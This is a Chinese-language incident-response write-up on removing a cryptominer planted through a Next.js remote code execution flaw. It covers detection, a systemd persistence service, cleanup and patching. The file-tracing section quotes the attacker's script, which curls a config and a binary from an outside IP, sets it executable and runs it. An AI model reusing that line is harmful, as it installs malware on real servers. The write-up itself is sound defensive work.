服务器被黑排查实录从 Next.js 漏洞到清除挖币矿工摘要某日服务器监控突然告警“检测到Web应用程序创建了可疑的子进程”。一场与加密劫持黑客的攻防战就此开始。本文完整记录了从警报分析、入侵确认、病毒查杀到根除后门的全流程。事件序幕突如其来的安全警报一切始于一条冰冷的安全告警「检测到Web应用程序创建了可疑的子进程」。关联的进程信息指向一个正在运行的next-server (v15.5.4)。这是一个危险信号表明运行在服务器上的 Next.js 应用可能已被利用。第一反应这会不会是误报但职业直觉告诉我们需要立刻以最坏的假设展开调查。漏洞背景危险的 React2Shell初步搜索后我们确认了一个关键信息Next.js v15.5.4 存在一个编号为CVE-2025-66478React2Shell的严重漏洞。其 CVSS 评分高达10.0属于远程代码执行漏洞。攻击者可以通过构造特异的 HTTP 请求在未授权的服务器上执行任意命令。漏洞时间线显示该漏洞在披露后极短时间内就被武器化并被用于大规模部署加密货币挖矿程序。我们的服务器很可能已成为受害者之一。现场排查发现入侵证据我们立刻登录服务器开始第一轮现场取证。1. 进程排查 (ps auxtop)首先使用ps aux查看所有进程发现多个可疑进程/tmp/ww1,/tmp/ww2,/tmp/ww3命名随机的可执行文件/root/c3pool/xmrig --config/root/c3pool/config.json明确的挖矿程序./k1EFHsNM以随机字符串命名的可执行文件是恶意软件的典型特征在top命令的默认视图中这些进程的 CPU 占用并不总是最靠前。这是因为攻击者使用了nice命令降低了进程优先级或使用了cpulimit等工具进行限制以此躲避粗略的巡检。2. 网络连接分析 (netstat -tunp)检查异常外联发现存在向auto.c3pool.org:19999等矿池地址的连接。这是挖矿程序正在工作的铁证。3. 文件溯源在/tmp目录下发现了攻击者的部署脚本#!/bin/bashcurl-C--o/tmp/config.json http://222.178.219.134:8088/config.json13curl-C--o/tmp/ww1 http://222.178.219.134:8088/wwwchmod777/tmp/ww1/tmp/ww1此脚本从一个远程服务器下载挖矿配置 (config.json) 和程序本体 (ww1)赋予执行权限后立即在后台运行。攻击者的钱包地址就明文写在配置文件中。溯源攻击路径入侵点所有证据都指向存在漏洞的next-server (v15.5.4)。攻击者利用 React2Shell 漏洞成功在服务器上执行了上述 bash 脚本从而植入挖矿木马。持久化机制简单的kill命令无效进程被杀死后会立即复活。这提示攻击者设置了持久化后门。系统服务后门执行systemctl list-units --typeservice后一个服务赫然在列c3pool_miner.service。攻击者创建了一个 systemd 服务确保挖矿程序能随系统启动并在退出时自动重启。这正是进程“杀不死”的原因。根除行动彻底清理面对具备自保护能力的挖矿木马必须进行组合式清理。注对于高CPU的java进程我们通过检查其JAR包路径、启动参数和所属服务最终排除了其恶意嫌疑确定为业务进程。以下清理行动针对已确认的挖矿程序。1. 铲除持久化后门# 停止并禁用恶意服务sudosystemctl stop c3pool_miner.servicesudosystemctl disable c3pool_miner.service# 删除服务文件sudorm-f/etc/systemd/system/c3pool_miner.servicesudosystemctl daemon-reload2. 清理定时任务检查crontab -l及/etc/cron.*目录清除所有包含恶意下载命令的任务。3. 终止进程并删除文件# 杀死所有相关进程sudopkill-9-fxmrigsudopkill-9-fwwsudopkill-fk1EFHsNM# 删除恶意程序及配置sudorm-rf/tmp/ww* /root/c3pool/sudofind/-name\k1EFHsNM\-execrm-f{}\\;2/dev/null4. 修复根本漏洞进入 Next.js 项目目录升级到已修复的安全版本npminstallnext15.5.9 react^19.2.1 react-dom^19.2.1npmrun build重要必须升级到15.5.9或更高版本因为15.5.7仍存在后续披露的拒绝服务漏洞。5. 轮换所有凭证由于漏洞存在远程代码执行能力必须假设服务器上所有密钥、密码、API Token 均已泄露。立即轮换数据库密码、SSH密钥、云服务凭证等所有敏感信息。经验总结与安全建议漏洞响应必须迅速高危漏洞从披露到被大规模利用窗口期可能只有数小时。务必订阅关键依赖的安全公告并建立快速更新流程。监控告警是生命线没有“可疑子进程”的告警入侵可能长期隐匿。应完善对异常进程、网络连接、CPU/内存占用的监控。挖矿木马的隐匿手段攻击者会通过重命名进程如k1EFHsNM、调整优先级、植入系统服务等多种方式隐藏。排查时需使用ps aux查看完整命令行、检查系统服务、分析网络连接进行立体排查。谨慎处置高资源进程对于资源占用高但身份不明的进程如本次的java进程应通过检查其执行路径、启动参数等方式进行验证避免误杀正常业务服务。遵循“清理-修复-加固”流程清理不仅要杀进程更要找到并清除所有持久化机制服务、定时任务。修复必须定位并修复最初被利用的漏洞点。加固及时更新软件轮换泄露凭证实施深度防御。这次事件是一次深刻的安全警示。在云时代任何面向公网的服务都可能成为攻击目标。保持警惕快速响应并实施深度防御是守护数字资产的唯一途径。